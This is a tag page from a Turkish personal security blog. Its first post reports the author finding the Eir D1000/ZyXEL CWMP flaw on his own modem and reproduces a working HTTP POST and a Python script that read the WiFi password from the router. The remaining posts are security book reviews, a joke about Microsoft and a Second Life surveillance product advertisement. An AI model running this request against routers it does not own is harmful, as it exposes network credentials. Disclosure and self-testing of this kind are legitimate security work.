Posts Tagged With ‘Security&8217


Eir’s D1000 Modem Güvenlik Zafiyeti

Uzun zamandır evde kullandığım cihazları için güvenlik taraması yapmamıştım. Çok fazla cihaz olmamakla birlikte aktif olarak kullandığım ZyXEL ADSL model ve TP-Link TL-WA850RE Kablosuz alan genişletici üzerinde iki adet kritik seviyede zafiyet tesbit edebildim. Önemli olan ZyXEL ADSL modem üzerinde CWMP protokolünden kaynaklanan ve can yakıcı olabilecek bir açık. Eir’s D1000 Modem üzerindeki açık hakkında detaylara bu adresten ulaşabilirsiniz.

Eir D1000 test etmek için biraz araştırma ardından bir kaç post isteğini test ederek WPA2 ile şifrelenmiş WiFi ağımın şifresine açıktan erişilebildim.  İlginç olan CWMP protokolünün 7457 nolu port üzerinden çalışması ve bu portun kapalı olmasına rağmen 80 portu üzerinden de protokolün çalışıyor olması. Geçici çözüm olarak ADSL üzerinde gelen firewall’u aktif hale getirip WAN üzerinden gelen bütün paket ve portlar  kapatmak için yapılandırdım. Varsayılan http 80 portu kapanmış oldu, fakat nmap ile full port taraması yapınca 8088 (8088/tcp open     http       Allegro RomPager 4.51 UPnP/1.0 (ZyXEL ZyWALL 2))  olan bir port açık gözükmekte ve firewall ile bu portu kapatamıyorsunuz. Ne güzel 🙂 şuan modemi yenilemekten başka çare gözükmüyor. Örnek post ve python script aşağıda bulabilirsiniz.

Eir D1000 CWMP açığı örnek http post;

POST /UD/act?1 HTTP/1.1
Host: 192.168.1.1:80
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys
Content-Type: text/xml
Content-Length: 318

<?xml version=”1.0″?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV=”http://schemas.xmlsoap.org/soap/envelope/” SOAP-ENV:encodingStyle=”http://schemas.xmlsoap.org/soap/encoding/”>
<SOAP-ENV:Body>
<u:GetSecurityKeys xmlns:u=”urn:dslforum-org:service:WLANConfiguration:1″>
</u:GetSecurityKeys>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

 

Örnek cevapta * olan kısımda açıktan WiFi şifrenizi bulabilirsiniz;

<?xml version=”1.0″?>
<SOAP-ENV:Envelope
xmlns:SOAP-ENV=”http://schemas.xmlsoap.org/soap/envelope/”
SOAP-ENV:encodingStyle=”http://schemas.xmlsoap.org/soap/encoding/”>
<SOAP-ENV:Body><u:GetSecurityKeysResponse xmlns:u=”urn:dslforum-org:service:WLANConfiguration:1″>
<NewWEPKey0></NewWEPKey0>
<NewWEPKey1></NewWEPKey1>
<NewWEPKey2></NewWEPKey2>
<NewWEPKey3></NewWEPKey3>
<NewPreSharedKey>********</NewPreSharedKey>
<NewKeyPassphrase></NewKeyPassphrase>
</u:GetSecurityKeysResponse>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

 

Örnek python test script;

import requests

headers = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
           'SOAPAction': 'urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys',
           'Content-Type': 'text/xml'
           }

raw_data = """
<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<u:GetSecurityKeys xmlns:u="urn:dslforum-org:service:WLANConfiguration:1">
</u:GetSecurityKeys>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
"""

req = requests.request('POST', 'http://192.168.1.1/UD/act?1', headers=headers, data=raw_data)
print(req.text)

“Secure Java For Web Application Development”

“Foundations of Security” kitabının arkasından okumaya başladığım “Secure Java For Web Application Development” kitabın sonua geldim. Kitap 300+ sayfa anlatılan içerik 100 sayfaya rahat sığar. Bazı konular çok kez tekrar edilmiş. Konular örnek bir uygulama üzerinden anlatılmış, yeni başlayanlar için oldukça ideal. Kitaptan beklediğim ve ismindede geçen Java’yı görmekti, malesef Java’dan pek fazla bahsedilmiyor  ve hatta Java Enterprise’ın ismi bile geçmiyor desem abartmış olmam. Çok detaylı teknik bilgi bulmak zor, bu yüzden genel bir kesime hitap ediyor.

Dr. Emin İslam Tatlı tarafından incelenen iki güvenlik kitabı da okunacaklar listemde yerini aldı. Okumaya başlayacağım birinci kitap “Architecting Secure Software Sytesm”.

 

 


“Foundations of Security” Hakkında

Geçtiğimiz hafta boş zamanlarımda okumaya başladığım “Fundation of Security: What Every Programmer Needs to Know” kitabı, an itibarı ile bitirmiş durumdayım. İsmindende anlaşılacağı gibi güvenlik ile ilgili temel bilgiler vermekte. Özellikle uygulama güvenliği açısından bir çok konu başlığını açıklamışlar. Kendi adıma konuşacak olursam, kitaptan herhangi bir şey öğrendim diyemem. Fakat, genel bir tekrar yapmış oldum. Bazı bilgileri kavramları yeniden hatırladım. Yazılım geliştirmeye yeni başlayan arkadaşlar için kesinlikle tavsiye ediyorum. Önümüzdeki hafta uygulama güvenliği üzerine (Java platformu tercihimdir) yeni bir kitap bitirmeyi planlıyorum.


Microsoft Komiksin :)

Microsoft, kendi veritabanı sunucularının Oracle’dan daha güvenli olduğunu idda ediyor. Bakınız şekil A. Şekil yapmışlar 🙂 belki haklılar veritabanı sunucuları güvenlidir ama işletim sisteminden kaybediyorlardır kim bilir….


WatchDog Surveillance System 2.0

WatchDog Surveillance System 2.0 is my first commercial SL product that has been sold by Temporal Industries. I have scripted this nice product.

Briefly;

Do you own property? Want to keep a close eye on it?

You need the state-of-the-art WatchDog Surveillance System 2.0, the most advanced working-camera surveillance and security camera system in Second Life. The powerful features and easy to use controls provide the absolute best, most flexible surveillance system available anywhere. Whether you want to monitor a private area, a large mall, or multi-sim amusements, the WatchDog Surveillance System answers the call.

No other system allows so many cameras and so much flexibility. No other system will teleport you where you need to be when you need to be there.

Set up 60 cameras – cloaked if you wish – in one sim, or scatter up to 600 cameras across multiple sims. Flip through camera views at the touch of a button on a Hud you wear, or delegate up to 10 Huds to your security staff.

Pan the view on any camera as far as you need, around corners, up ramps. Teleport to any camera view in seconds.

The WatchDog Surveillance System 2.0 lets you:

* Set up to 60 cameras per sim, 600 per System
* Flip through camera views at the touch of a button
* Remote operate any camera – follow a person or sweep the area
* Teleport to any view in seconds
* Up to 10 Huds to allowed, each monitoring specific areas
* Restrict different Huds to specific cameras; even your eyes only
* Add more cameras and Huds as you expand; alter the structure as you wish.
* Add new Huds in quantities of 1, 2, or 5.
* Use blue laser technology to setup cameras easily
* Each camera is just one prim
* Cloak or uncloak your cameras on command

With the Faithful WatchDog Surveillance System 2.0, you are the master of all you survey.

Also available in system packages with:

System Package One: One Transferable HUD, Unlimited Copiable Cameras
System Package Two: Two Transferable HUDs, Unlimited Copiable Cameras

Come Visit our main shop in Semoshi!

Come Visit our second shop in Strigoiu!